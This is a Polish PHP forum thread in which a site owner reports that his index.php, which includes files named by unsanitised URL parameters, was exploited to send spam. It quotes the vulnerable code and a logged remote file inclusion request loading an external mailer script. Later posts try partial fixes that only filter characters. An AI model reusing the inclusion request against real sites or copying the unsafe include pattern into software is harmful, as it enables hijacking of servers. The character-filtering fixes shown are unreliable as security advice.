Zostałem zaatakowany. Hacked & SPAM

Zostałem zaatakowany. Hacked & SPAM

admin22 Zobacz profil	18.12.2006, 18:37:45 Post #1
Grupa: Zarejestrowani Postów: 36 Pomógł: 0 Dołączył: 18.12.2006 Ostrzeżenie: (0%)	Witam. Miałem nie dawno przykre doświadczenie z wykorzystaniem mojego skryptu do rozsyłania spamu. Struktura moich adresów www była nateępująca: http://domena.pl/?dzial=katalog& str=nazwa_pliku [PHP] pobierz, plaintext <?php if ($dzial=="" && $str=="") { include "serwis/pierwsza.php"; } else { $adres="$dzial"."/"."$str.php"; include "$adres"; } ?> [PHP] pobierz, plaintext Niestety skrypt został wykorzystany przeciwko mnie: 196.207.13.162 - - [14/Dec/2006:15:23:38 +0100] "POST /?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt? HTTP/1.1" 200 20865 "http://domena.pl/?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" W konsekwencji zmienna dział pozwala na wykorzystywanie obcych skryptów. W jaki sposób mam przekształcić prosty skrypt, aby nie umożliwiał zmiennej dział i str na tego typu działania. Bardzo proszę o pomoc z uwagi na to że mój serwis został zablokowany.

Odpowiedzi

admin22 Zobacz profil	19.12.2006, 06:04:16 Post #2
Grupa: Zarejestrowani Postów: 36 Pomógł: 0 Dołączył: 18.12.2006 Ostrzeżenie: (0%)	I co może coś innego?? Bo albo czegoś nie mam zainstalowanego, albo żle to robie!! Pojawia mi się taki komunikat: Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/aa16006/domains/domena.pl/public_html/index.php on line 279 [PHP] pobierz, plaintext <?php if ($dzial=="" && $str=="") { include "serwis/pierwsza.php"; } else { if(isset($_GET['dzial'])) { $page = ereg_replace("://","#",$_GET['dzial']); } else { $adres="$dzial"."/"."$str.php"; include "$adres"; } } ?> [PHP] pobierz, plaintext [PHP] pobierz, plaintext <?php przed includem$_GET['plik']=str_replace("/", "#", $_GET['plik']);include $_GET['plik'];dalej.... ?> [PHP] pobierz, plaintext Nie wiem jak to zrobić!! I nie wiem co dalej!! Co oznacza ten komunikat: Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/aa16006/domains/domena.pl/public_html/index.php on line 279 Jeżeli coś mam z serwerem że skrypty nie działają to skontaktuje się ze swoim adminem serwera!! Ktoś wie o co biega?? Pleaasss F1, F1, F1..

Posty w temacie

admin22 Zostałem zaatakowany. Hacked & SPAM 18.12.2006, 18:37:45

fiszol Temat: Bezpieczenstwo skryptow php na 1-szej stron... 18.12.2006, 18:40:25

admin22 I co może coś innego?? Bo albo czegoś nie mam zain... 19.12.2006, 06:04:16

nospor [PHP] pobierz, plaintext <?php$page = ereg_repl... 19.12.2006, 08:57:16

admin22 ślicznie dziękuje ) 19.12.2006, 19:14:11

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Aktualny czas: 18.10.2025 - 03:33

Hosting zapewnia

Forum PHP.pl